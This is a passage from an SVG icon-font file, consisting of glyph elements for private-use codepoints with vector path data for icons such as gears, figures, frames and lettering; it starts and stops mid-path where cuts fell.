13.104-14.544-14.548 12.552-17.781c-2.157-3.431-4.035-7.078-5.474-11.004-0.58-1.576-0.802-3.152-1.246-4.728l-22.514-3.841v-20.522l21.537-3.733c1.246-5.634 3.45-10.915 6.276-15.926l-13.104-18.526 14.487-14.6 17.781 12.609c3.435-2.185 7.102-4.063 11.056-5.531 1.576-0.58 3.181-0.807 4.79-1.251l3.7-22.396h20.598l3.761 21.457c5.639 1.251 10.92 3.454 15.926 6.276l18.441-13.1 14.6 14.572-12.548 17.668c2.213 3.45 4.12 7.135 5.587 11.108 0.552 1.548 0.774 3.124 1.217 4.7l22.316 3.841v20.598l-21.424 3.676c-1.246 5.611-3.454 10.92-6.276 15.898l13.076 18.555-14.567 14.548-17.752-12.472c-3.402 2.161-7.050 4.039-11.004 5.507-1.519 0.552-3.067 0.774-4.62 1.189l-3.926 22.396h-14.709l7.107 41.894c8.131 2.072 15.926 5.144 23.335 9.013l38.511-27.186 31.569 31.584-26.242 37.161c3.256 5.559 6.168 11.391 8.489 17.639 0.646 1.727 1.085 3.473 1.642 5.214l46.453 7.989v44.716l-44.759 7.715c-2.1 8.102-5.177 15.898-9.013 23.283l27.124 38.516-31.461 31.593zM402.404 620.811c-17.724 0-32.074 14.331-32.074 32.027 0 17.748 14.36 32.098 32.074 32.103 17.752 0 32.074-14.35 32.074-32.103 0-17.696-14.322-32.027-32.074-32.027zM668.45 419.649c17.611 0 31.909-14.322 31.909-32.022 0-17.724-14.298-32.046-31.909-32.046-17.696 0-32.103 14.322-32.103 32.046 0.005 17.701 14.402 32.022 32.103 32.022zM643.865 586.113c-17.606 0-31.956 14.294-31.956 32.018 0 17.757 14.35 32.051 31.956 32.051 17.663 0 31.956-14.294 31.956-32.051 0.005-17.724-14.289-32.018-31.956-32.018zM317.832 544.445c-18.578 0-33.754-15.152-33.754-33.816 0-18.781 15.181-33.962 33.754-33.962 18.753 0 34.009 15.181 34.009 33.962 0 18.663-15.266 33.816-34.009 33.816z" />
<glyph unicode="&#xe657;" d="M691.050 313.552h87.97c6.878 0 12.41 5.555 12.405 12.372 0 6.883-5.531 12.438-12.405 12.438h-87.97c-6.845 0-12.382-5.555-12.382-12.438 0-6.817 5.531-12.372 12.382-12.372zM891.764 691.964h-312.212v-245.241h312.212v245.241zM869.105 467.512h-267.156v203.542h267.156v-203.542zM364.334 683.801h-50.742v-50.728h-50.742v-50.742h50.742v-50.728h50.742v50.728h50.718v50.742h-50.718zM691.050 602.825h87.97c6.878 0 12.41 5.522 12.405 12.396 0 6.836-5.531 12.396-12.405 12.396h-87.97c-6.845 0-12.382-5.56-12.382-12.396 0-6.873 5.531-12.396 12.382-12.396zM889.791 951.252h-745.121c-73.013 0-132.414-59.415-132.414-132.442v-745.089c0-73.045 59.401-132.442 132.414-132.442h745.121c73.017 0 132.437 59.397 132.437 132.442v745.089c0 73.031-59.42 132.442-132.437 132.442zM148.040 778.219v-166.65h-24.936c-4.713 0-8.547 3.797-8.547 8.547v215.049c0 7.276 5.424 13.204 12.877 13.204h110.185c7.425 0 12.877-5.906 12.877-13.176v-12.629h170.363c4.741 0 8.547-3.82 8.547-8.519v-48.362h-145.431v12.662c0 7.262-5.424 13.176-12.905 13.176h-110.129c-7.477-0.005-12.901-6.004-12.901-13.303zM487.84 502.122h-297.75c-4.741 0-8.547 3.797-8.547 8.519v215.063c0 7.276 5.424 13.204 12.868 13.204h110.167c7.458 0 12.91-5.906 12.91-13.176v-12.629h170.353c4.741 0 8.547-3.82 8.547-8.519v-193.943h0.005c-0.005-4.727-3.811-8.519-8.552-8.519zM914.147 65.557h-356.904v649.398h356.904v-649.398zM891.764 402.701h-312.212v-245.278h312.212v245.278zM869.268 178.347h-267.128v203.495h267.128v-203.495z" horiz-adv-x="1029" />
<glyph unicode="&#xe658;" d="M886.508 951.252h-745.182c-72.989 0-132.386-59.401-132.386-132.428v-745.089c0-73.041 59.401-132.456 132.386-132.456h745.182c73.017 0 132.414 59.415 132.414 132.456v745.089c0 73.031-59.397 132.428-132.414 132.428zM565.725 694.532c58.162 0 105.35-47.118 105.35-105.336 0-58.144-47.188-105.374-105.35-105.374s-105.346 47.23-105.346 105.374c0 58.218 47.183 105.336 105.346 105.336zM131.053 661.207v84.309h84.305v84.305h84.305v-84.305h84.305v-84.309h-84.305v-84.295h-84.305v84.295h-84.305zM842.233 111.076c-7.809 0-15.313 1.524-22.163 4.264l-93.787 26.091v-93.493h-325.576v93.493l-93.759-26.091c-6.883-2.74-14.355-4.264-22.163-4.264-33.151 0-60.028 26.951-60.028 60.061 0 12.461 3.783 24.029 10.245 33.591l150.392 206.221c16.328 22.36 39.122 47.282 87.208 47.282h181.814c48.058 0 70.88-24.922 87.185-47.282l150.388-206.221c6.471-9.562 10.273-21.13 10.273-33.591 0-33.109-26.905-60.061-60.028-60.061zM400.683 386.111v-125.064l11.4 3.848c83.874 24.726 116.498-86.016 32.632-110.69l-2.684-0.753 121.473-40.203 121.487 40.203-2.74 0.753c-83.814 24.67-51.181 135.416 32.632 110.69l11.451-3.848v125.064l-162.83-53.197-162.821 53.197z" />
<glyph unicode="&#xe659;" d="M880.621 952.879h-742.381c-72.742 0-131.918-59.669-131.918-133.045v-748.516c0-73.376 59.176-133.040 131.918-133.040h742.377c72.732 0 131.96 59.664 140.302 134.031v748.516c-8.342 72.385-67.565 132.054-140.297 132.054zM522.926 713.733c50.773 0 91.845-41.42 91.845-92.559 0-51.167-32.345-92.644-91.845-92.644-50.716 0-91.855 41.477-91.855 92.644 0 51.139 41.138 92.559 91.855 92.559zM153.412 426.778h163.281l-52.9-175.461h-110.381v175.461zM867.187 84.532h-59.063v166.79h-131.664l47.297-166.79h-392.408l47.132 166.79h-32.12l-40.664-139.128c-5.003-17.366-20.752-28.625-37.808-28.625-3.659 0-7.37 0.521-11.057 1.569-20.903 6.163-32.89 28.212-26.826 49.293l33.792 116.891h82.559l33.524 117.112h31.575l-32.698-117.112h297.697l-29.724 105.054c-4.796 16.929-4.143 25.623-1.663 32.533l19.32 37.869h-347.695l1.959 5.421c11.405 26.337 55.024 71.971 119.028 71.971h179.214l61.163 108.055-34.858 141.965c-5.205 21.302 7.675 42.825 28.832 48.109 21.067 5.284 42.473-7.736 47.701-29.038l38.63-157.377c2.433-9.911 0.982-20.395-4.011-29.254l-89.957-159.857h143.726v377.504h59.063v-719.745zM423.875 339.005c0 26.896 21.593 48.635 48.278 48.635 26.643 0 48.208-21.744 48.213-48.635 0-26.835-21.565-48.659-48.213-48.659-26.685 0-48.278 21.823-48.278 48.659zM534.58 339.005c0 26.896 21.593 48.635 48.26 48.635s48.227-21.744 48.227-48.635c0-26.835-21.56-48.659-48.227-48.659s-48.26 21.823-48.26 48.659z" />
<glyph unicode="&#xe65a;" d="M364.361 713.31v-193.982c0.028-14.655-11.532-26.544-26.037-26.601-14.477 0-26.483 11.922-26.483 26.601v193.982h-50.721v-193.982c0-14.655-11.56-26.544-26.065-26.601-14.477 0-26.478 11.922-26.478 26.601v193.982h-48.743v-252.209h252.609v252.209h-48.081zM886.845 953.227l-748.563 0.005c-73.352 0-133.021-59.683-133.021-133.045v-748.516c0-73.376 59.674-133.045 133.021-133.045h748.563c73.348 0 133.017 59.669 133.017 133.045v748.511c0 73.362-59.669 133.045-133.017 133.045zM134.097 435.393v303.625h74.48v60.609h-8.009l-0.136 14.533h68.040l0.085-14.533h-7.431v-60.609h50.726v60.609h-8.009l-0.103 14.533h67.983l0.108-14.533h-7.459v-60.609h73.813v-303.625h-304.086zM412.944 352.439l186.053-107.478-18.404-31.899-186.091 107.478 18.441 31.899zM875.172 75.527h-457.498v76.358c0 0 88.073 0 162.529 0 111.203 0 201.719 90.469 201.719 201.662 0 70.299-36.498 133.82-93.362 170.078l-92.752-160.636-19.24 11.118-27.361-47.339-48.466 27.991 27.357 47.311-19.268 11.114 220.578 382.093 14.834-8.563 22.185 38.423 58.020-33.496-22.129-38.48 14.092-8.122-89.727-155.31c80.093-49.678 131.593-138.127 131.593-236.192 0-79.595-34.050-150.908-87.796-201.662 36.963 0 104.702 0 104.697 0.005v-76.354z" />
<glyph unicode="&#xe65b;" d="M888.785 956.731l-748.577 0.005c-73.348 0-133.021-59.683-133.021-133.045v-748.516c0-73.376 59.674-133.045 133.021-133.045h748.577c73.348 0 133.017 59.669 133.017 133.045v748.511c0 73.362-59.669 133.045-133.017 133.045zM513.86 849.164c53.953 0 97.736-43.403 97.736-96.937 0-53.549-43.774-96.979-97.736-96.979-53.943 0-97.754 43.431-97.754 96.979 0.005 53.53 43.807 96.937 97.754 96.937zM778.442 203.222c-21.889-6.276-44.272 4.74-50.016 24.797l-74.841 261.252-36.498 0.056 119.587-416.848h-445.642l119.615 416.848-36.549-0.056-74.808-261.252c-5.754-20.062-28.155-31.072-49.998-24.797-21.894 6.276-35.723 25.403-28.376 50.448l76.969 268.048c30.743 107.121 120.428 103.776 120.428 103.776h191.112c0 0 89.656 3.344 120.442-103.776l76.941-268.048c7.356-25.046-6.487-44.173-28.367-50.448zM513.888 386.222c-79.83 0-144.53-64.653-144.53-144.497 0-79.787 64.69-144.506 144.53-144.506 79.755 0 144.454 64.709 144.454 144.506 0 79.844-64.69 144.497-144.454 144.497zM577.287 228.54c-3.424-7.267-21.701-45.798-25.417-53.53-10.259-21.654-36.178-30.908-57.879-20.663-7.032 3.387-12.429 8.582-16.952 14.284-6.867 8.671-11.471 31.791-11.471 31.791-7.21-5.092-25.652-16.708-33.275-22.129-6.943-4.843-16.534-3.194-21.419 3.744-4.927 6.943-3.222 16.516 3.673 21.415 10.982 7.685 41.42 28.376 41.42 28.376 9.263 6.501 22.021 4.383 28.522-4.927l12.922-26.258 20.546 41.533-17.953 5.256c-3.95 1.127-7.196 3.852-9.108 7.487l-17.615 33.825c-3.819 7.328-0.991 16.375 6.369 20.175 7.309 3.852 16.342 0.963 20.189-6.332 0 0 10.597-20.367 14.67-28.212 9.676-2.837 49.030-14.284 49.030-14.284 2.133-0.667 3.922-1.87 5.538-3.274 9.343-5.956 13.072-18.009 8.211-28.277zM591.149 293.357c-8.23-17.286-28.883-24.689-46.197-16.459-17.361 8.173-24.745 28.869-16.53 46.24 8.215 17.286 28.912 24.689 46.226 16.487 17.338-8.23 24.689-28.926 16.501-46.268z" />
<glyph unicode="&#xe65c;" d="M627.75 273.032c-5.609 10.79-22.674 27.549-41.251 27.549-22.101 0-40.044-16.713-40.044-37.432 0-10.512 2.781-23.345 10.24-30.109 3.824-3.467 6.557-7.074 6.914-14.613 0.277-8.422-1.794-12.993-5.477-16.981-3.617-3.734-8.709-10.667-10-14.219-1.292-3.523-1.677-6.557-1.677-10.080 0-20.668 17.943-37.437 40.044-37.437 21.626 0 38.452 19.461 44.699 36.554 4.542 15.717 7.952 31.232 7.267 50.416-0.615 20.344-6.478 37.71-10.714 46.352zM476.151 233.049c7.487 6.764 10.076 19.597 10.076 30.109 0 20.72-17.774 37.432-39.908 37.432-18.634 0-35.643-16.76-41.279-27.549-4.326-8.643-10.080-26.009-10.733-46.348-0.639-19.184 2.837-34.708 7.37-50.416 6.191-17.103 22.899-36.554 44.643-36.554 22.133 0 39.908 16.755 39.908 37.437 0 3.523-0.249 6.557-1.597 10.080-1.212 3.542-6.388 10.475-9.911 14.219-3.8 3.997-5.829 8.558-5.477 16.981 0.329 7.534 3.053 11.142 6.91 14.608zM890.152 954.33h-748.567c-73.348 0-133.017-59.679-133.017-133.059v-748.492c0-73.385 59.669-133.054 133.017-133.054h748.567c73.348 0 133.017 59.669 133.017 133.054v748.492c0 73.385-59.669 133.059-133.017 133.059zM515.288 868.314c62.168 0 112.541-50.35 112.541-112.494 0-62.098-50.373-112.466-112.541-112.466-62.121 0-112.513 50.369-112.513 112.466 0 62.149 50.392 112.494 112.513 112.494zM808.603 116.074c0-27.221-21.415-49.293-48.635-49.293-27.192 0-49.237 22.072-49.237 49.293 0 31.706 0 314.542 0 314.542h-41.2v-380.825h-306.744v380.825h-40.796c0 0 0-282.835 0-314.542 0-27.221-21.993-49.293-49.213-49.293-27.164 0-48.607 22.072-48.607 49.293 0 27.192 0 308.374 0 348.893 0 79.576 71.008 144.116 150.631 144.116 38.508 0 249.443 0 288.942 0 79.651 0 144.854-64.54 144.854-144.116 0.005-40.518 0.005-321.7 0.005-348.893z" horiz-adv-x="1029" />
<glyph unicode="&#xe65d;" d="M887.136 952.56h-748.549c-73.343 0-133.012-59.669-133.012-133.045v-748.488c0-73.376 59.669-133.073 133.012-133.073h748.549c73.338 0 133.035 59.697 133.035 133.073v748.488c0.005 73.376-59.693 133.045-133.035 133.045zM250.354 805.259c50.397 0 91.258-40.899 91.258-91.268 0-50.448-40.857-91.291-91.258-91.291-50.425 0-91.286 40.847-91.286 91.291 0 50.369 40.866 91.268 91.286 91.268zM151.801 74.855v474.333c0 28.019 22.735 50.726 50.744 50.726h75.607c10.79 0 20.724-3.438 28.897-9.827 0 0 98.633-77.148 125.853-98.45l94.18 30.109c22.378 7.154 46.268-5.176 53.441-27.578 7.154-22.321-5.186-46.268-27.568-53.45l-115.585-36.934c-13.382-4.293-28.052-1.658-39.137 7.018l-47.813 37.404 103.814-373.351h-302.432zM877.554 74.855h-130.973v380.51h-18.225l-111.095-215.608c-10.376-20.588-35.394-28.954-55.972-18.634-20.616 10.32-28.954 35.309-18.662 55.888l133.176 256.127-51.689 8.314-4.129-14.975-127.591 28.569 3.579 15.989-23.862 5.341-3.654-15.961-9.521 2.118 10.954 48.88 9.578-2.118-3.551-15.961 23.862-5.313 3.579 15.91 127.563-28.569-2.255-14.561 53.422-15.604 9.193 17.671c14.204 22.152 31.176 34.952 68.58 34.952h117.704v-522.963zM787.461 622.371c-50.505 0-91.423 40.927-91.423 91.376 0 50.533 40.918 91.488 91.423 91.488 50.439 0 91.394-40.955 91.394-91.488 0-50.448-40.955-91.376-91.394-91.376zM296.481 424.641h-54.742v-45.93h-45.709v-54.906h45.709v-45.69h54.742v45.69h45.873v54.906h-45.873z" />
<glyph unicode="&#xe65e;" d="M702.239 377.325c-12.913 35.474 5.383 74.719 40.81 87.599l57.616-157.348h53.201v517.111h-677.291v-517.101h551.231l-25.567 69.74zM682.947 591.092h-136.789v-39.908h121.189c6.985 0 12.626-5.613 12.626-12.579s-5.641-12.607-12.626-12.607h-121.189v-39.88h116.534c4.871 0 11.973-4.35 11.973-11.973 0-67.899-8.53-99.99-44.314-99.99-37.183 0-44.807 80.506-84.193 85.762v-76.955h-62.318v77.063c-41.369-3.11-48.029-85.87-86.641-85.87-35.774 0-42.379 32.092-42.379 99.99 0 7.628 7.102 11.973 12.001 11.973h117.027v39.88h-121.184c-6.99 0-12.659 5.641-12.659 12.607 0 6.961 5.67 12.579 12.659 12.579h121.184v39.908h-136.403c-6.938 0-12.579 5.641-12.579 12.631 0 6.938 5.641 12.607 12.579 12.607h136.403v39.884h-128.038c-6.938 0-12.579 5.641-12.579 12.636 0 6.961 5.641 12.631 12.579 12.631h128.038v39.88h-100.272c-7.018 0-12.631 5.641-12.631 12.607s5.613 12.659 12.631 12.659h100.267v22.049h62.314v-22.049h100.272c6.957 0 12.626-5.698 12.626-12.659s-5.67-12.607-12.626-12.607h-100.272v-39.88h128.395c6.961 0 12.631-5.67 12.631-12.631 0-6.994-5.67-12.636-12.631-12.636h-128.395v-39.884h136.789c6.943 0 12.612-5.67 12.612-12.607-0.005-6.99-5.674-12.631-12.612-12.631zM889.499 954.077h-748.567c-73.348 0-133.017-59.674-133.017-133.050v-748.478c0-73.38 59.669-133.078 133.017-133.078h748.567c73.343 0 133.012 59.697 133.012 133.078v748.478c0.005 73.38-59.669 133.050-133.012 133.050zM874.637 286.767h-66.273l10.926-30.166c12.058-32.998 4.796-68.228-15.938-93.555l39.222-113.316-165.879 0.028-19.818 59.979c-32.143 6.027-60.378 28.404-72.352 61.351l-42.172 115.684h-386.583v558.752h718.867v-558.756z" />
<glyph unicode="&#xe65f;" d="M348.39 686.658c-5.919 4.956-14.204 7.431-24.858 7.431h-42.054v-65.808h42.054c10.653 0 18.935 2.696 24.858 8.037 5.919 5.369 8.859 13.843 8.859 25.487 0.005 11.612-2.94 19.898-8.859 24.853zM700.627 377.377c-12.969 35.478 5.369 74.691 40.894 87.655l23.317-64.263 15.745-42.797 18.498-50.369h53.168v517.139h-677.31v-517.139h551.255l-25.567 69.773zM384.033 606.147c-13.072-10.898-31.758-16.346-56.038-16.346h-46.512v-80.342h-46.404v223.439h95.946c22.129 0 39.743-5.778 52.905-17.286 13.157-11.532 19.728-29.367 19.728-53.506 0-26.399-6.553-45.028-19.625-55.958zM605.564 509.459h-169.322v223.439h163.845v-39.579h-118.211v-47.452h108.525v-38.809h-108.525v-57.443h123.688v-40.157zM629.478 732.893h180.99v-39.579h-66.828v-183.86h-47.010v183.86h-67.152v39.579zM887.864 954.077h-748.567c-73.319 0-132.988-59.674-132.988-133.050v-748.478c0-73.38 59.669-133.078 132.988-133.078h748.567c73.348 0 133.045 59.697 133.045 133.078v748.478c0 73.38-59.697 133.050-133.045 133.050zM872.974 286.88h-66.222l10.982-30.227c11.95-32.946 4.763-68.199-15.985-93.527l42.364-115.022h-170.285l-18.549 61.708c-32.148 6.003-60.411 28.348-72.385 61.294l-42.139 115.768h-386.532v558.648h718.754v-558.644z" horiz-adv-x="1038" />
<glyph unicode="&#xe660;" d="M696.011 375.333c-12.933 35.288 5.354 74.322 40.665 87.255l23.285-63.97 34.059-92.768h52.963v514.834h-674.334v-514.829h548.85l-25.488 69.478zM725.525 729.203h46.192v-222.418h-46.192v222.418zM463.091 506.784h-43.321v150.444c0 4.33 0.056 10.385 0.159 18.194 0.108 7.781 0.136 13.808 0.136 18.025l-42.138-186.663h-45.182l-41.844 186.663c0-4.218 0.056-10.245 0.136-18.025 0.103-7.809 0.164-13.864 0.164-18.194v-150.444h-43.321v222.418h67.649l40.469-174.88 40.203 174.88h66.887v-222.418zM688.395 506.784h-51.289c-1.426 4.905-2.413 8.903-3.039 11.919-1.206 6.219-1.856 12.634-1.945 19.152l-0.295 20.686c-0.192 14.191-2.656 23.646-7.341 28.354-4.713 4.741-13.56 7.098-26.498 7.098h-45.402v-87.208h-45.43v222.418h106.421c15.178-0.304 26.905-2.221 35.068-5.728 8.192-3.535 15.15-8.711 20.821-15.533 4.713-5.644 8.44-11.891 11.203-18.713 2.74-6.85 4.11-14.659 4.11-23.398 0-10.577-2.656-20.962-8-31.155-5.321-10.221-14.135-17.45-26.409-21.672 10.273-4.11 17.534-9.973 21.808-17.59 4.274-7.589 6.411-19.18 6.411-34.769v-14.93c0-10.165 0.411-17.071 1.234-20.686 1.239-5.728 4.082-9.945 8.575-12.685v-5.56zM625.402 686.648c-4.788 2.604-11.951 3.918-21.513 3.918h-51.317v-59.752h50.031c9.945 0 17.403 1.206 22.36 3.614 8.795 4.218 13.176 12.573 13.176 25.067 0.009 13.48-4.241 22.523-12.737 27.152zM882.407 949.428h-745.215c-72.994 0-132.395-59.401-132.395-132.442v-745.061c0-73.045 59.401-132.47 132.395-132.47h745.215c73.022 0 132.391 59.425 132.391 132.47v745.061c0 73.045-59.369 132.442-132.391 132.442zM867.613 285.226h-65.947l10.904-30.089c11.919-32.768 4.741-67.888-15.888-93.1l42.176-114.501h-169.587l-18.432 61.431c-31.973 5.971-60.112 28.218-72.059 61.015l-41.933 115.24h-384.884v556.121h715.65v-556.116z" horiz-adv-x="1015" />
<glyph unicode="&#xe661;" d="M700.454 377.377c-12.997 35.45 5.336 74.663 40.871 87.627l23.341-64.235 15.717-42.825 18.498-50.364h53.201v517.167h-677.315v-517.167h551.25l-25.562 69.796zM286.894 562.279c10.127-12.495 23.002-18.714 38.611-18.714 16.022 0 28.24 5.341 36.634 16.046 4.65 5.778 8.511 14.421 11.56 25.934h46.404c-4.011-24.36-14.223-44.145-30.654-59.425-16.459-15.247-37.54-22.871-63.22-22.871-31.796 0-56.78 10.292-74.973 30.913-18.221 20.724-27.3 49.129-27.3 85.185 0 39.020 10.348 69.078 31.044 90.187 18 18.413 40.899 27.606 68.669 27.606 37.212 0 64.404-12.33 81.605-36.991 9.493-13.843 14.58-27.742 15.275-41.697h-46.681c-2.973 10.71-6.797 18.798-11.452 24.275-8.314 9.686-20.644 14.533-36.963 14.533-16.624 0-29.752-6.853-39.354-20.532-9.606-13.707-14.397-33.083-14.397-58.128-0.005-25.079 5.059-43.849 15.191-56.32zM584.338 509.426l-14.731 45.939h-82.296l-15.144-45.939h-48.847l79.764 223.467h52.844l79.041-223.467h-50.632zM621.873 693.314v39.579h180.994v-39.579h-66.856v-183.888h-47.015v183.888h-67.124zM500.031 593.873h57.222l-28.24 87.914zM887.662 954.077h-748.567c-73.319 0-132.988-59.674-132.988-133.050v-748.478c0-73.38 59.669-133.078 132.988-133.078h748.567c73.343 0 133.045 59.697 133.045 133.078v748.478c0 73.38-59.702 133.050-133.045 133.050zM872.805 286.852h-66.25l11.010-30.227c11.945-32.918 4.768-68.199-16.018-93.527l42.355-115.022h-170.28l-18.549 61.708c-32.12 6.027-60.355 28.348-72.356 61.294l-42.139 115.768h-386.532v558.677h718.768v-558.672z" horiz-adv-x="1029" />
<glyph unicode="&#xe662;" d="M888.663 954.077h-748.567c-73.319 0-132.988-59.674-132.988-133.050v-748.478c0-73.38 59.669-133.078 132.988-133.078h748.563c73.343 0 133.045 59.697 133.045 133.078v748.478c0.005 73.38-59.697 133.050-133.040 133.050zM873.777 286.852h-66.25l11.010-30.227c11.94-32.918 4.768-68.199-16.018-93.527l42.355-115.022h-170.285l-18.545 61.708c-32.12 6.027-60.355 28.348-72.356 61.294l-42.139 115.768h-386.532v558.677h718.763v-558.672zM701.426 377.377c-12.997 35.45 5.341 74.663 40.866 87.627l23.345-64.235 15.717-42.825 18.498-50.364h53.196v517.167h-677.31v-517.167h551.255l-25.567 69.796zM379.214 562.279c10.123-12.495 23.002-18.714 38.616-18.714 16.018 0 28.24 5.341 36.634 16.046 4.65 5.778 8.511 14.421 11.56 25.934h46.404c-4.011-24.36-14.223-44.145-30.654-59.425-16.459-15.247-37.54-22.871-63.22-22.871-31.796 0-56.785 10.292-74.973 30.913-18.225 20.724-27.3 49.129-27.3 85.185-0.005 39.020 10.343 69.078 31.044 90.187 18 18.413 40.899 27.606 68.664 27.606 37.216 0 64.409-12.33 81.605-36.991 9.493-13.843 14.585-27.742 15.275-41.697h-46.681c-2.973 10.71-6.797 18.798-11.452 24.275-8.314 9.686-20.644 14.533-36.958 14.533-16.624 0-29.752-6.853-39.363-20.532-9.606-13.707-14.388-33.083-14.388-58.128-0.005-25.079 5.059-43.849 15.186-56.32zM645.665 509.426h-47.010v183.888h-67.128v39.579h180.985v-39.579h-66.847v-183.888z" />
<glyph unicode="&#xe663;" d="M905.737 942.175c0 0-780.61 0.247-780.383 0-71.945 0-112.393-37.196-112.393-113.19v-783.455c0-71.092 36.361-108.307 108.26-108.307h786.764c71.889 0 108.297 35.366 108.297 108.307v783.455c0.009 74.145-36.399 113.19-110.545 113.19zM772.257 101.888h-132.826v285.127h-247.922v-285.127h-132.817v635.781h132.817v-240.849h247.922v240.849h132.826v-635.781z" />
<glyph unicode="&#xe664;" d="M467.7 817.185c0-15.909-12.897-28.806-28.806-28.806s-28.806 12.897-28.806 28.806c0 15.909 12.897 28.806 28.806 28.806 15.909 0 28.806-12.897 28.806-28.806zM900.201 947.32c-0.019 0-781.791 0.249-781.542 0-72.053 0-112.583-37.256-112.583-113.377v-784.633c0-71.192 36.443-108.477 108.41-108.477h787.973c71.996 0 108.467 35.438 108.467 108.477v784.633c0 74.254-36.472 113.377-110.726 113.377zM878.879 680.86l-248.631 37.582v21.734h-101.596l-0.144-35.113c27.887-5.225 101.098-49.956 101.098-136.833v-504.87c0-12.527-5.847-33.4-30.902-33.4h-222.371c-25.064 0-30.902 20.872-30.902 33.4v504.87c0 86.877 75.91 131.608 103.462 136.833l-0.115 29.428c-66.828-16.709-89.327-51.564-109.386-79.968s-59.067-4.594-44.865 23.81c10.221 29.792 62.014 78.714 100.639 92.973-9.752 5.857-20.786 23.035-20.786 42.252 0 40.462 31.103 67.268 65.44 67.268 35.266 0 60.081-29.294 60.081-52.128h29.237v-36.73h101.108v23.389l248.631 36.137v-170.635z" horiz-adv-x="1014" />
<glyph unicode="&#xe665;" d="M889.010 956.134h-748.549c-73.362 0-133.035-59.679-133.035-133.045v-748.502c0-73.376 59.674-133.059 133.035-133.059h748.549c73.333 0 133.031 59.683 133.031 133.059v748.502c0 73.371-59.697 133.045-133.031 133.045zM721.389 689.321c50.975 0 92.282-41.312 92.282-92.315 0-50.965-41.317-92.296-92.282-92.296s-92.324 41.331-92.324 92.296c0 50.998 41.355 92.315 92.324 92.315zM772.223 481.008c-0.714-92.489-16.713-104.669-50.284-104.669-33.529 0-49.547 12.18-50.256 104.669h100.54zM494.559 717.584c11.255 0 20.424-9.15 20.424-20.438s-9.169-20.452-20.424-20.452c-11.311 0-20.452 9.164-20.452 20.452s9.141 20.438 20.452 20.438zM348.456 847.642c16.079 0 29.118-13.068 29.118-29.142 0-16.088-13.040-29.128-29.118-29.128-16.102 0-29.146 13.040-29.142 29.128 0 16.074 13.040 29.142 29.142 29.142zM190.332 847.853c16.323 0 29.588-13.138 29.588-29.334 0-16.206-13.265-29.334-29.588-29.334s-29.56 13.129-29.56 29.334c0 16.201 13.237 29.334 29.56 29.334zM280.247 659.888c-1.489-5.252-7.295-9.507-12.993-9.023-5.698-0.479-10.512 3.772-12.053 9.023l-22.622 79.078h-11.062l32.801-136.892h-28.761v-97.233c0-8.023-6.496-14.519-14.533-14.519-8.037 0-14.505 6.496-14.505 14.519v97.233h-12.246v-97.233c0-8.023-6.548-14.519-14.585-14.519-8.009 0-14.477 6.496-14.477 14.519v97.233h-29.245l33.097 136.892h-11.062l-22.603-79.078c-1.761-6.050-9-10.649-15.632-8.774-6.609 1.912-10.325 8.986-8.093 16.548l23.284 81.117c9.305 32.42 36.427 31.396 36.427 31.396h57.851c0 0 27.141 1.024 36.441-31.396l12.081-42.097 12.081 42.097c9.296 32.42 36.441 31.396 36.441 31.396h74.766c0 0 27.141 1.024 36.441-31.396l23.063-80.384 17.943-1.738c0.221 0.019 55.681 0.061 55.681 0.061 14.421 0 27.164-11.738 27.164-26.201v-51.66c0-4.951-3.88-8.958-8.836-8.958-4.923 0-8.915 4.002-8.915 8.958 0 5.778 0 45.441 0 45.441h-9.277c0 0 0-124.181 0-134.022 0-6.604-5.421-11.987-12.053-11.987s-12.001 5.383-12.001 11.987c0 9.841 0 71.699 0 71.699h-9.385c0 0 0-61.858 0-71.699 0-6.604-5.369-11.987-11.973-11.987-6.633 0-12.081 5.383-12.081 11.987h-0.009v143.44l-29.339 8.206c-5.092 1.536-9.855 6.012-11.175 10.597l-21.030 76.448h-11.062c0 0 0-217.328 0-231.321 0-9.427-7.703-17.079-17.126-17.079-9.446 0-17.098 7.652-17.098 17.079 0 13.998 0 131.612 0 131.612h-12.626c0 0 0-117.619 0-131.612 0-9.427-7.68-17.079-17.098-17.079-9.465 0-17.168 7.652-17.168 17.079 0 13.998 0 231.321 0 231.321h-10.184l-22.655-79.078zM905.371 90.521c0-22.354-2.010-40.457-2.010-40.457h-308.562v280.477h-12.579l-57.274-85.457c-9.329-12.715-28.268-18.883-43.351-18.883h-134.463c-22.354 0-40.462 18.094-40.462 40.415 0 22.279 18.108 39.866 40.462 39.866h122.298l84.828 128.305c20.367 31.021 58.044 45.826 92.099 45.826 0-90.229 22.486-128.418 63.136-128.418v-150.021c-11.424-4.909-19.461-16.276-19.461-29.532 0-17.727 14.176-31.927 31.899-31.927 17.746 0 31.955 14.585 31.955 32.369 0 13.227-8.037 24.595-19.465 29.494v150.068c40.631 0.009 63.145 38.142 63.145 128.362 67.575 0 107.797-40.251 107.797-101.902v-288.585z" />
<glyph unicode="&#xe666;" d="M445.281 436.624v0.164c9.674 3.783 16.071 12.11 16.071 27.863 0 22.411-14.574 32.576-36.869 32.576-10.656 0-20.307-0.327-30.65-1.478v-108.581h21.144v42.91h10.979c2.787 0 3.446-1.473 4.255-4.578l10.025-38.328 22.103 0.005-13.275 44.387c-0.659 2.759-1.478 4.405-3.783 5.059zM426.765 446.957h-11.788v33.072c3.451 0.327 6.883 0.491 10.31 0.491 12.643 0 15.243-7.533 15.243-17.179 0.005-11.479-4.077-16.384-13.766-16.384zM590.82 434.983h28.714v17.534h-28.714v26.194h31.838v17.698h-52.949v-109.236h54.244v17.212h-33.133zM167.772 434.983h28.686v17.534h-28.686v26.194h31.786v17.698h-52.93v-109.236h54.249v17.212h-33.105zM343.321 434.983h28.714v17.534h-28.714v26.194h31.823v17.698h-52.939v-109.236h54.239v17.212h-33.123zM259.563 454.981l-21.471 41.428h-19.83v-109.236h20.653v70.577l20.653-41.418 20.485 41.582h0.659v-70.74h19.825v109.236h-19.83zM517.419 430.255h14.878v-3.918c0.005-11.325-1.632-24.090-15.711-24.090-18.348 0-18.825 26.025-18.825 39.45 0 13.289 1.328 38.496 19.503 38.496 8.51 0 12.601-4.741 17.352-10.628l11.643 15.561c-8.388 8.328-17.057 13.097-28.686 13.097-30.958 0-41.965-29.481-41.965-56.661 0-26.876 10.011-56.194 40.343-56.194 29.64 0 35.545 25.726 35.545 49.479v12.746h-34.073v-17.338zM839.021 387.173h20.994v41.76l27.704 67.481h-21.49l-16.548-49.783-16.566 49.783h-22.631l28.536-68.631zM641.342 387.173h20.648v67.453h0.491l35.078-67.453h18.507v109.236h-20.48v-64.68h-0.304l-33.455 64.68h-20.485zM890.45 946.777h-757.685c-65.059 0-125.961-61.043-125.961-126.083v-757.475c0-65.068 61.155-126.415 126.237-126.415h757.442c65.059 0 126.321 61.019 126.321 126.088v757.718c-0.005 